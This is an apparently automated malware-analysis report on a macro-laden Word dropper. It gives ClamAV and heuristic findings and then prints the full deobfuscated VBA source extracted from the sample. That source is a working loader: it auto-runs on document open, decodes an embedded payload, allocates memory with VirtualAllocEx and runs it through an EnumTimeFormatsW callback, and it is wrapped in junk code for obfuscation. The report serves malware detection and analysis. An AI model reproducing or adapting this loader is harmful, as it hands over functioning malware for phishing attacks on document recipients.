MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic identifies the file as 'Doc.Dropper.Agent-1830698', indicating it's a dropper. The presence of VBA macros, specifically a Document_Open macro, suggests an attempt to automatically execute malicious code upon opening. The macro's obfuscated nature and references to APIs like VirtualAlloc point towards payload execution, likely involving downloading additional malware.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-1830698 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1830698
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() Dim alight As Variant -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12006 bytes |
SHA-256: fc81393b1893b6f255a5b78c224c75eee340a4a24fe678ea69374211fb808a06 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim alight As Variant
Dim actitis As Variant
memorialist = "canker"
immodest
hemangioma = 4
While hemangioma <> 7
hemangioma = hemangioma + 1
torpedinidae = torpedinidae And 162
ghee = engross
Wend
End Sub
Function salvo(boehmenism)
Dim accipere As Long
Dim ctenizidae As Integer
Dim immense As Long
mesocricetus immense, VarPtr(boehmenism) + 8, 4
Dim saracen As String
Dim donation As Integer
Dim degrading As Long
auspicial = 0
aerodynamics = 57 - 56 - 2
reasoned = 13 - 65 + 52
gewonnen = Round(473.95)
gewonnen = gewonnen \ 74
mare = 4096
bankruptcy = paganism(ByVal aerodynamics, ByVal reasoned, 9915, mare, 64)
gewonnen = torpedinidae * 4
mesocricetus degrading, VarPtr(bankruptcy) + 8, 4
gewonnen = gewonnen \ 150
mesocricetus ByVal degrading, immense, 6183
electrophoresis = 57
taipei = 76
If (electrophoresis - taipei) <> 18 Then
electrophoresis = "go" & "lden"
ghee = "tubed"
gewonnen = torpedinidae Or 210
sociolinguistics = Mid("subtestuncomlignified", 8, 5) & LCase$("municaTi") & Replace("vcoherent", "coherent", "e")
Else
ghee = "apology"
taipei = 76
End If
salvo = degrading
End Function
Sub immodest()
Dim abba As Variant
Dim apodemus As String
Set mountains = unflattering.witness.SelectedItem
sectional = mountains.Name
heliograph = 67 + 8177
antioxidant = Right(sectional, heliograph)
depicture = bargainpriced.conjugation(antioxidant)
For informative = 49 To 66
buxus = 66
gewonnen = gewonnen * 3
intoxicate = LCase$("AVE") & Mid("unvaluedrsenetitian", 9, 5) & LCase$("SS")
intoxicate = LCase$("lE") & "avings"
Next informative
lambaste = "bras"
#If VBA6 And Win64 Then
Dim mysophobic As Variant
Dim eclaircissement As cebu
Dim alula As LongPtr
eclaircissement.start = 29 - 29
Dim pleurotus As String
#Else
Dim despise As Integer
eclaircissement = 0
Dim bouncing As Long
Dim alula As Long
#End If
indistinct = 0
atropa = "snu" & "ffcolored"
sacred = 100 - 44 - 15 + 4055
For allochthonous = 35 To 57
impugnable = 57
engross = "bowiea"
pinto = Replace("sebioluminescent", "bioluminescent", "lf") & "lessness"
pinto = "str" & "uctur" & Replace("ainclemency", "inclemency", "l")
Next allochthonous
unagitated = "subpanation"
kwack = "fluoroboride"
For alectryomancy = 48 To 76
ichthyolatry = 76
gewonnen = gewonnen - 369
banteng = "ph" & "onetic"
banteng = Mid("passeridaecojeffersonian", 11, 2) & "unter" & Mid("mpjumperunit", 3, 6)
Next alectryomancy
anecdotic = depicture
lycanthropy = "nonsurgical"
alula = salvo(anecdotic)
addresses = Mid("backswimmerwjdigitalis", 12, 2)
meekly = "bronze"
#If VBA6 And Win64 Then
Dim allegory As String
dishonest = "causans"
moraceous = "agaricaceae"
arrowy = 62 + 6 + 70 + 1142
#ElseIf Win32 Then
cornishman = "comptrollership"
slash = "ca" & "ntab" & Mid("scopoliarigianclumsy", 9, 6)
bandurria = 17 + 32 + 457
arrowy = bandurria + 3171
#End If
Dim myxine As String
Dim heliport As Variant
Dim sabbath As Long
sabbath = 92 + 86 - 101 + 1971
Dim astound As Long
astound = alula + arrowy
Dim inconsequence As Long
inconsequence = 0
zonam = ohmmeter(astound, sabbath, inconsequence)
For cocaine = 3 To 74
amalgamative = 74
ghee = "melody"
aversation = LCase$("bu") & "shman"
aversation = Replace("acivility", "civility", "n") & "alogue"
Next cocaine
End Sub
Sub num()
With Selection
If .Columns.Count > 1 And .Rows.Count > 1 Then
MsgBox "Please select cells in only one row " _
& "or only one column."
End
Else
If .Cells.Count > 1 Then
If .Columns.Count > 1 Then
.Cells.Delete ShiftCells:=wdDeleteCellsShiftUp
Else
.Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
End If
Else
.Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
End If
End If
End With
End Sub
Attribute VB_Name = "bargainpriced"
'Love's an elusive charm and it can be painful
#If VBA6 And Win64 Then
'п»їLove can be so strange
Public Type cebu
'No you're never gonna crack
start As LongPtr
'You can keep it pure on the inside
End Type
'And you know what you believe to be right
Public Declare PtrSafe Function hoop Lib "user32" Alias "EndPaint" (flatten As LongPtr,education As LongPtr) As LongPtr
'You can keep it pure on the inside
Public Declare PtrSafe Function workboard Lib "user32" Alias "OpenClipboard" (garderobe As LongPtr) As Boolean
'Cause life is so short there's no time to waste it
Public Declare PtrSafe Function nube Lib "kernel32.dll" Alias "Sleep" (bone As LongPtr)
'To late for solutions to solve in the setting sun
Public Declare PtrSafe Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (busbar As Any, ByVal accompanist As Any, ByVal buckleya As LongPtr)
'To understand this crazy world
Public Declare PtrSafe Function arbitrage Lib "user32" Alias "SetParent" (ByVal impetrate As LongPtr, ByVal tc As LongPtr,dunderhead As LongPtr) As LongPtr
'To understand this crazy world
Public Declare PtrSafe Function barroom Lib "user32" Alias "GetUpdateRect" (halfbeak As LongPtr, imperator As LongPtr,cog As LongPtr) As Boolean
'So when nothing seems too certain or safe
Public Declare PtrSafe Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal nonpasserine As Any, ByVal alumnus As Any, ByVal rhamnus As Any) As LongPtr
'So when nothing seems too certain or safe
Public Declare PtrSafe Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (cotenancy As LongPtr, africanamerican As LongPtr, ByVal lollipop As LongPtr, ByVal assisted As LongPtr, ByVal base As LongPtr) As LongPtr
'So when nothing seems too certain or safe
'So when nothing seems too certain or safe
#Else
'So when nothing seems too certain or safe
Public Declare Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal cryptobiotic As Any, ByVal temerarious As Any, ByVal furlike As Any) As Long
'So when nothing seems too certain or safe
Public Declare Function ladyofthenight Lib "user32" Alias "GetUpdateRect" (disclaimer As Long, pliers As Long, duck As Long) As Boolean
'So when nothing seems too certain or safe
Public Declare Function foxy Lib "user32" Alias "EndPaint" (chilblain As Long, anthericum As Long) As Long
'So when nothing seems too certain or safe
Public Declare Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (estranged As Any, ByVal exhaled As Any, ByVal genial As Long)
'So when nothing seems too certain or safe
Public Declare Function prohibitionist Lib "user32" Alias "SetParent" (ByVal pawky As Long, ByVal motazilite As Long, phantom As Long) As Long
'No you're never gonna crack
Public Declare Function overrighteous Lib "kernel32.dll" Alias "Sleep" (fluster As Long)
'So when nothing seems too certain or safe
Public Declare Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (amore As Long, chieftaincy As Long, ByVal pedantry As Long, ByVal unestablished As Long, ByVal neglige As Long) As Long
'Run my baby run my baby run
Public Declare Function gullet Lib "user32" Alias "OpenClipboard" (angular As Long) As Boolean
'So run my baby run my baby run
'No you're never gonna crack
#End If
'No you're never gonna crack
Function runup(gift)
runup = AscW(gift)
End Function
Function conjugation(diffusive) As String
Dim travesty As Byte
Dim counts As Long
Dim shakeout As Long
Dim constringe(63) As Long
Dim brooklime As Integer
Dim mutal(63) As Long
backbend = engross
Dim twentyeight(63) As Long
Dim levity As String
Dim gumption As Long
Dim bugloss() As Byte
Dim cosigner(255) As Byte
Dim ghyll As String
Dim cruciferous As String
Dim pentahedron As Long
Dim leisureiy(6965) As Byte
engross = backbend
Dim pianino As Variant
arthroscopy = 73 + 16711607
barbarian = 33 - 6 - 109 + 338
gracefully = 94 + 24 - 53 + 190
spermatophyta = 126 + 14 + 11 - 87
fuliginous = 16515072
nuptial = 4032
belted = 87 - 71 + 65520
cutlery = 258048
stung = 110 - 119 + 262153
Dim acclamation As Variant
Dim mutilate As Variant
bumboat = 65280
visavis = 4096
potboiler = 63
Dim bushwhacker As String
Dim botryoid(8243) As Byte
hagiography = 49 + 90 - 139
enwrap = 128 + 8115
For auburn = hagiography To enwrap
marvelous = 1
aposiopetic = Mid$(diffusive, auburn + 1, marvelous)
diet = LCase$("In") & "gest" & Replace("esait", "sait", "d")
brooch = "in" & "finitival"
testiness = "cashmere"
latria = runup(aposiopetic)
botryoid(auburn) = latria
Next
Dim nobody As Long
diver = 8
While diver <> 11
diver = diver + 1
torpedinidae = Round(361.1195)
gewonnen = torpedinidae \ 184
Wend
neurology = 8243
decolletage = 35
For cherubim = 0 To neurology
botryoid(cherubim) = botryoid(cherubim) + 8
Next cherubim
For hasten = 45 To 51
saline = 51
backbend = ghee
brooding = "si" & "mon"
brooding = "pro" & "hibiti" & "vely"
Next hasten
brooklime = 0
fist = 122
boundless = 67 + 188
For pentahedron = 0 To boundless
If (pentahedron >= 65) And (pentahedron <= 90) Then
cosigner(pentahedron) = pentahedron - 65
ElseIf (pentahedron >= 97) And (pentahedron <= 122) Then
cosigner(pentahedron) = pentahedron - 71
ElseIf (pentahedron >= 48) And (pentahedron <= 57) Then
cosigner(pentahedron) = pentahedron + 4
ElseIf pentahedron = 43 Then
cosigner(pentahedron) = 62
ElseIf pentahedron = 47 Then
cosigner(pentahedron) = 63
End If
Next pentahedron
For pentahedron = 0 To 63
constringe(pentahedron) = antipoison(pentahedron, spermatophyta)
mutal(pentahedron) = antipoison(pentahedron, visavis)
twentyeight(pentahedron) = antipoison(pentahedron, stung)
Next pentahedron
archon = 6
While archon <> 10
archon = archon + 1
torpedinidae = Abs(305.933)
gewonnen = Fix(222.1423)
Wend
bugloss = botryoid
koine = 30 + 28 - 120 + 66
For brushy = 6 To 53
dendrobium = 53
gewonnen = torpedinidae * 1
pelican = Replace("macknowledgment", "acknowledgment", "e") & LCase$("tEorOlOgy")
pelican = LCase$("Bi") & Mid("cobolsulcousexpressive", 6, 7)
Next brushy
educt = 80 - 67 - 10
engross = "anthriscus"
backbend = "drynaria"
calibration = educt + 1
mute = 50 - 92 + 44
For counts = 0 To neurology
alkylbenzenesulfonate = bugloss(counts)
discreditable = bugloss(counts + 2)
gumption = twentyeight(cosigner(alkylbenzenesulfonate)) _
+ mutal(cosigner(bugloss(counts + 1))) + constringe(cosigner(discreditable)) + cosigner(bugloss(counts + educt))
pentahedron = draw(gumption, arthroscopy)
leisureiy(shakeout) = slowconsuming(pentahedron, belted)
pentahedron = draw(gumption, bumboat)
leisureiy(shakeout + 1) = slowconsuming(pentahedron, barbarian)
leisureiy(shakeout + mute) = draw(gumption, gracefully)
shakeout = shakeout + mute + 1
counts = counts + 3
Next
conjugation = leisureiy
End Function
Function antipoison(strawbail, periphrase)
antipoison = strawbail * periphrase
End Function
Sub tableSel()
Dim tempTable
Documents("Log.doc").Tables(1).Select
Set tempTable = Selection.Tables(1).Range
tempRange.Tables(2).Select
End Sub
Function draw(cambodia, agamid)
draw = cambodia And agamid
End Function
Function slowconsuming(titus, analgesia)
slowconsuming = titus \ analgesia
End Function
Attribute VB_Name = "unflattering"
Attribute VB_Base = "0{FB913D05-D54F-43AE-B223-61BE15D5BE39}{8E83D3FF-7B80-4FEA-A1FA-EA1D5AC9E624}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.